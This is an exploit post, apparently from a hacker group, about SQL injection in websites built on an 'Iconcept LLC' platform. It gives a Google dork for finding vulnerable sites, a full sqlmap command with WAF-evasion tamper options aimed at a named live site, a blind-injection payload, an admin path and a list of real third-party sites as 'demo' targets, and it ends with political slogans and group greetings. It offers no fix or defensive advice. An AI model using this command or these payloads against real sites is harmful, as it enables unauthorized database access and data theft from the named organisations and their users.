#################################################################################
# Exploit Title: Dubai Iconcept LLC Sql İnjection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : intext:"Powered by Iconcept LLC" inurl:pr_id=
# Tested on : Kali Linux 2017.3
# Date : 22.12.2017
# Vendor Home: http://iconceptme.com/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup
#################################################################################
Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Sqlmap Or Manuel
[+] Manager: localhost.com/admin/
[+] Sql GET Parameter "pr_id" İs Vulnerable.
Command:root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10 --random-agent --text-only --no-cast -u "http://www.maqammed.ae/product.php?pr_id=258" --tamper=space2comment,randomcase --dbs
Parameter: pr_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pr_id=258 AND 7960=7960
Demo Sql:
http://www.dynaspex.com/safinat/product.php?pr_id=1480#popup1
http://www.cvision.ae/product.php?pr_id=39
http://www.maqammed.ae/product.php?pr_id=258
FREE PALESTINE & FREE GAZA ===> İSREAL TERRORIST #KUDUS İSLAMİNDİR!
Greet'Zzz : ABIKANBEY & EfendiBey & Atabey & TrazeR & Zer0day & Kutluhan & Göçebe & BlueTrojen